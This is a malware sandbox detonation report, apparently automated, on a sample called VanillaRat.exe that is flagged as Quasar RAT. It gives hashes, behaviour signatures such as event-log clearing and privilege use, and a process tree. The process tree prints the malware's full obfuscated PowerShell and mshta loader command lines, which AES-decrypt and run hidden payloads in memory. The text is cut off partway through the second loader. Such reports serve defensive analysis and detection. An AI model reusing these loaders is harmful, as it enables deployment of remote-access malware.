| SHA1 | 9ade4234c3e4b4d34d977ba47ce61696e33576eb |
| SHA256 | 9d10ffafefa66265489ffb2bac91b511e60a6344dcb0a60d764617430f663575 |
| SHA512 | d88364d452e8f49bde17107d1c7b3b056e92d2c6398b2aacd5dbe37cca966f21d6d255ceffe4190d509a3fed22b4c81ae048d98d6c09958ab980cd64674bef92 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.9abea24d-0d76-4344-bf68-bd1d66a7d33e.tmp.csv
| MD5 | 760f33d64a2005296ec2984480f1998a |
| SHA1 | c1b44ba448a5670a26ee2fac984bf8504b47e9f2 |
| SHA256 | 65b7945fd01e7c92d4eb4a2c1a11e4140dbe4c2db4bb88149e496dd2a8a2aae8 |
| SHA512 | a834b6b10ebc5c72e9bc3e217fd24118b20ede3075f1523cc17ff5fcc6c9c9ffa715e0964c2a32a9dc5a7ee001af2e0c692f45c837f7476ffa7235f59dc21a5c |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.31f23360-6ef1-4caa-8810-37ca873d5b83.tmp.txt
| MD5 | a3f78579d0e85640326d3842ac9d0b28 |
| SHA1 | f9078ae972ac9b57c4475b604afe2627feb35d85 |
| SHA256 | b872d5239f2fc516d13dda7963f6909490ad7bb67a61dd8e4dd3398d76a2bf12 |
| SHA512 | c1b00ec809afd3a3e7644b0303b92acf102562444c70ec57069b1c743855835aee04fc352f8eaa5ab059e8170541e5288aa13844464d44f174ffee77c6ea4d46 |
memory/552-1457-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-08-18 13:35
Reported
2024-08-18 13:37
Platform
win11-20240802-en
Max time kernel
59s
Max time network
53s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5292 created 5172 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\System32\dllhost.exe |
| PID 1180 created 3140 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\$sxr-powershell.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-cmd.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\$sxr-mshta.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe
"C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -WindowStyle Hidden -command "& {Start-Process -FilePath 'Handlers\Handler.bat' -WindowStyle Hidden -Wait}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d490fd13-03bc-43de-899e-2e1d4c594870}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{5bceada9-83a7-4a7b-b04b-6941595c7e5c}
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 